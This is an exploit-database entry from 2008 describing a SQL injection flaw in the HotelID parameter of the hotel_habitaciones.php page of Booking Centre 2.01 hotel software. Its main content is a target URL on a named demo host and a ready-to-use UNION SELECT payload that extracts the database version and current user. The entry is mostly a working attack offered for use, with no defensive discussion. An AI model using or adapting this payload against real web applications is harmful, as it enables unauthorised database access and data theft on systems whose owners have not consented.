id: 4278
date: 11/27/2008
title: Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

================================================================
Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability
================================================================


 [~] ----------------------------------------------------------
 [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
  
 [~]Vendor: www.bookingcentre.eu
  
 [~]Software: Hotels Group
  
 [~] Date: 28.11.2008 
  
 [~] Home: www.ahacker.biz 
  
 [~] contact: N/A 
 [~] ----------------------------------------------------------- 
  

 [~] Exploit: 

 http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)


 [~] (SQL): 

 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
  
 [~]-------------------------------------------------------------------------------- 




#  0day.today [2023-03-25]  #